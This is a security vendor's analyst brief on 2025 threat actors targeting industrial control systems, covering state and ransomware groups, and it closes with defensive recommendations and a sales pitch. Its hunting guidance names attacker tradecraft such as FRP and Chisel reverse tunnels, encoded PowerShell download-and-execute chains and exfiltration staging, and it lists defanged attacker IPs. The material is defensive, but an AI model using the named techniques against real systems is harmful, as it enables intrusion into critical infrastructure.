Nothing Like AugurHow It WorksGet AccessLearn More

2025 Analyst Brief: Critical Infrastructure Threat Actors

Threat Research Team
Download PDF

Key Takeaways

  • Ransomware and APT overlap is growing as nation-sponsored actors increasingly disguise infrastructure pre-positioning campaigns as data extortion operations.​
  • Middle Eastern ICS systems experience 1.8× higher infection rates than the global average, driven by weak segmentation and outdated firmware.​
  • Targeted OT vulnerabilities include Trimble Cityworks (CVE‑2025‑0994) and Windows zero‑click flaws exploited by Chinese APTs.​
  • Hacktivism-as-cover remains a major attribution challenge, as numerous “grassroots” OT defacement campaigns in 2025 are now tied to military cyber units.​

Introduction

This report provides an analytical overview of industrial control system (ICS) and operational technology (OT) threat activity observed throughout 2025. The year marked an evolution in adversary objectives, with a focus on pre-positioning and maintaining access over immediate disruption. Both state-aligned and financially motivated actors expanded campaigns targeting ICS and supervisory control and data acquisition (SCADA) networks, exploiting blurred boundaries between IT and OT environments.

The report consolidates findings from government advisories (notably CISA and DOE), vendor telemetry (Mandiant, Dragos, Unit 42, CrowdStrike), and open threat exchanges. It highlights cross-sector targeting in utilities, water, oil and gas, and transportation, as well as the industrial supply chain dependencies that bridge these critical systems. The report also examines how proxy infrastructures, FRP-based tunneling, and hybrid ransomware-APT tradecraft have become defining hallmarks of 2025 operations.

State-Aligned Actors

Volt Typhoon

Volt Typhoon continued to execute low-and-slow reconnaissance and access-maintenance operations against U.S. critical infrastructure, particularly in the electric, water, and transportation sectors. The actor’s focus on persistence rather than disruption indicates a strategic posture of operational readiness. Telemetry from Unit 42, CISA, and Microsoft identified Volt Typhoon’s use of Fast Reverse Proxy (FRP) tooling, PowerShell-based living-off-the-land scripts, and compromised SOHO routers for ingress. Activity logs revealed FRP sessions enumerating administrative panels, jump hosts, and management networks, suggesting preparatory mapping for lateral movement into OT zones.

APT41 / Mission 2025

APT41 sustained multi-vector intrusions into engineering firms, manufacturing supply chains, and software vendors. Distinct from Volt Typhoon, APT41’s operations focused on intellectual property exfiltration targeting proprietary designs, firmware, and build pipelines critical to industrial production. The group relied on cloud-based redirectors, serverless API endpoints, and multi-stage implants that blended espionage and cybercrime TTPs. Public analyses showed a preference for long-term access retention through credential theft and exploitation of developer toolchains, aligning with broader Chinese objectives of strategic technological acquisition.

Sandworm / APT44

Sandworm reaffirmed its position as the most operationally capable and destructive ICS actor. While most destructive incidents remained within the Ukrainian theater, Sandworm’s tradecraft and malware development continued to shape global ICS security models. Research from Mandiant, ESET, and Google’s Mandiant Threat Response documented new variants of Industroyer2 and CaddyWiper, both of which align with historical grid-targeting operations. Sandworm’s continued integration of ICS protocol manipulation and system-level wipers illustrates its enduring capacity for real-world disruption, making it the benchmark for destructive OT operations worldwide.

Iran-linked Clusters (CyberAv3ngers, MuddyWater, APT35, Nimbus Manticore)

Iranian threat clusters intensified campaigns against water utilities, oil & gas infrastructure, and engineering contractors across the Middle East, with spillover into U.S. supply chains. Analyses from CISA and Dragos identified phishing-driven credential theft, compromise of exposed PLC interfaces, and unauthorized HMI access as recurring entry vectors. These activities demonstrate growing Iranian proficiency in OT reconnaissance, coupled with opportunistic attacks against exposed industrial assets. Some incidents leveraged legitimate remote access software to maintain persistence, further blurring the boundary between espionage and sabotage.

Ransomware and Crime Groups Targeting Industrial Sectors

Cl0p

Cl0p remained the dominant industrial ransomware operator in 2025, exploiting high-impact vulnerabilities in enterprise systems that bridge IT and OT. Reports from Honeywell and multiple CERTs documented Cl0p’s selective encryption strategy, which targeted engineering datasets, project archives, and OT network documentation, while avoiding the immediate disruption of control systems. Campaigns exploiting MOVEit Transfer and Oracle E-Business Suite (CVE-2025-61882) highlighted the group’s rapid weaponization of newly disclosed vulnerabilities. Cl0p’s continued reliance on data theft and extortion rather than full encryption represents a trend toward covert monetization in critical infrastructure environments.

Qilin, Gunra, Anubis

These ransomware collectives, identified by Dragos in Q2 2025, exemplify the convergence of criminal and APT methodologies. Targeting engineering firms, construction vendors, and utilities, they maintained persistent access for weeks before initiating encryption or data theft. The actors’ operational tempo and tool selection mirrored state-sponsored approaches leveraging custom loaders, FRP tunnels, and reconnaissance of OT-adjacent networks. This blending of financially motivated and state-aligned tradecraft highlights the increasing difficulty in distinguishing between espionage and extortion in industrial contexts.

Observed Infrastructure and Tradecraft Patterns

Actors across ecosystems standardized on multi-hop proxy chains, Go-based loaders, and reverse-tunneling frameworks (FRP, Chisel, SSH) to obscure C2 paths. Initial access continues to rely heavily on phishing, VPN exploitation, and compromised cloud assets. Once inside, adversaries pivot using harvested SSO tokens, PsExec, and WMI, with persistence often anchored in custom services or scheduled tasks. ICS-specific reconnaissance typically involves enumeration of Modbus TCP, DNP3, and OPC UA endpoints, revealing ongoing efforts to map industrial networks rather than disrupt them directly. Detection remains weakest at the embedded controller and edge device layer, where limited logging and proprietary protocols impede visibility.

Augur Insights

Augur consistently uncovers malicious infrastructure long before it becomes visible to the broader industry and has been particularly effective in identifying threat actors targeting ICS and OT systems,  months, and in some cases, years, before their public reporting.

For example, Augur detected IP 91.149.241[.]103, later linked to APT41, on October 12, 2022, well before its industry disclosure on January 7, 2025. Similarly, IP 31.192.107[.]144, now attributed to Qilin, was first flagged by Augur on October 16, 2018,  years prior to its industry recognition on July 31, 2025.

Recommendations

1) Network & Perimeter Controls

  1. Adopt preemptive cybersecurity tools such as Augur to bolster traditional Detection and Response ahead of first attacks and reduce alert noise in the SOC
  2. Block and log known reverse-tunnel protocols and anomalous outbound ports
    • Enforce egress allowlist; block uncommon outbound ports (8080/8443/8043) from OT segments and non-proxy hosts. Monitor TLS sessions on non-standard ports and multiplexed TLS connections.
  3. DNS and TLS inspection
    • Enforce recursive DNS logging + passive DNS; inspect/TLS-terminate outbound flows (where policy allows) to detect domain fronting, cloud redirector C2, and rapid hostname churn.
  4. Restrict direct internet access from OT/ICS subnets
    • Only allow approved jump hosts in DMZ; no direct internet from PLCs/HMI; use strictly controlled application proxies for remote vendor access.
  5. Detect multi-hop proxying
    • Alert on internal hosts initiating persistent outbound connections that correlate with inbound connections to the same host (sign of reverse tunnel). Instrument flow logs and use session correlation.

2) Endpoint & Host Hardening

  1. Block living-off-the-land misuse
    • Harden PowerShell/WMIC/PsExec: enable script logging, ConstrainedLanguageMode where possible, and block encoded/remote PowerShell. Log command-line and module loads.
  2. EDR posture
    • Ensure EDR can detect FRP binaries, suspicious process parents, and scripts that spawn networking utilities. Deploy host-level allowlisting for critical OT/engineering workstations.
  3. Protect SOHO/remote routers.
    • Inventory any customer/vendor-managed routers; require vendor attestations and minimum baseline configs: disable remote admin, require strong credentials, firmware up-to-date, and remote-access via VPN into jump hosts only.
  4. Credential hygiene
    • Enforce MFA everywhere (including vendor/remote access), rotation of service account keys, and limit local admin use. Monitor for abnormal SSO token usage and token-based lateral movement.

3) Cloud, DevOps & Toolchain Protections

  1. CI/CD and artifact protection
    • Enforce role separation: developers vs build service vs deploy. Use ephemeral build agents, sign artifacts, protect artifact repositories (Nexus/Artifactory), and log all artifact pulls/pushes.
  2. Monitor developer tooling and cloud projects.
    • Inventory cloud projects, service accounts, and public cloud resources. Detect creation of suspicious serverless functions, unusual IAM role grants, or outbound connections from build runners to uncommon hosts. 
  3. Hardening recommendations
    • Enforce least privilege for service accounts, require OIDC/short-lived credentials for CI, lock down webhooks, and monitor pipeline logs for exfil signals (large artifact transfers to unknown endpoints).
  4. Incident control
    • Create a “compromised CI playbook”: rotate secrets, revoke CI tokens, rebuild pipelines on known-good images, and require artifact re-signing.

4) OT & ICS-Specific Controls

  1. Increase telemetry at the edge
    • Add packet capture or full-session logging for OT gateways. Instrument Bro/Zeek/Suricata at the OT/IT boundary. Capture Modbus/DNP3/OPC UA requests and alert on unexpected enumerations.
  2. Segmentation & microsegmentation
    • Strict zone enforcement: Management networks are separated from control networks; prohibit lateral SMB/WinRM/PsExec traffic across zones.
  3. Read-only monitoring for controllers
    • Where possible, use passive taps or read-only OPC UA proxies to minimize the impact on controllers while still gaining visibility.
  4. Detection examples for ICS recon
    • Alert on large numbers of function code reads, abnormal register scans, and repeated HMI session enumeration in short windows.

5) Detection & Hunting Playbook

A) Living-off-the-land PowerShell / WMI abuse

  • Alert on PowerShell with encoded commands, download-file + invoke-expression chains, or unusual parent process (e.g., mshta -> powershell). Log full command line, module loads, and network I/O following those processes.

B) Cloud redirector / serverless C2 detection

  • Alert on new serverless functions exposing outbound network to irregular endpoints, or sudden spikes in API Gateway responses to unknown IPs.
  • Monitor for ephemeral public IP addresses used by customer cloud projects and correlate them with suspicious DNS registrations.

C) Ransomware / Exfil staging detection

  • Alert on large archive creation of engineering directories, access to project archives followed by uncommon outbound transfers (S3 buckets, unregistered domains, or multi-part uploads). Track unusual use of Oracle EBS endpoints or file transfer utilities after privilege escalations. 

6) Response & Recovery

  1. Incident playbooks by scenario
    • Reverse-tunnel detection playbook, developer-toolchain compromise playbook, and OT intrusion playbook. Each must list containment steps, evidence collection, vendor engagement, and legal/regulatory notifications.
  2. Forensics readiness
    • Ensure full packet captures at perimeter and key chokepoints are available for at least 30 days, and that endpoint EDR telemetry (process, network, file hashes) is retained and immutable during incident response.
  3. Backups & air gapping
    • For engineering and OT documentation, enforce immutable backups, offline copies, and limits on administrative access to backup systems.
  4. Controlled disclosure & law enforcement coordination
    • Pre-establish contacts at CISA, local CERTs, and law enforcement. Have a trusted third-party for forensic validation.

Sources

China-Linked Threats (Volt Typhoon, APT41, Mission 2025)

Russia-Linked Threats (Sandworm / APT44)

Iran-Linked Threats (MuddyWater, APT35, Nimbus Manticore, CyberAv3ngers)

Ransomware & Criminal Ecosystem (Cl0p, Qilin, Anubis, Industrial Crime)

OT / ICS Threat Landscape & Broader Industrial Reports

The Augur Difference. Let Us Prove It To You.

Experience firsthand the benefits of preemptive cyber defense with a quick proof of value (POV). We can have you up and running in less than a day, and after 30 days, get an Augur report detailing:

  • Threats Augur identified
  • Advance warning timelines
  • Data-driven insight on alert reduction and improved SOC efficiency

Click here to talk to an Augur specialist now

Augur Security
4660 La Jolla Village Dr. # 100 San Diego, CA 92122 USA
(888) 521-5857
Terms & ConditionsPrivacy Policy
© COPYRIGHT 2026 AUGUR SECURITY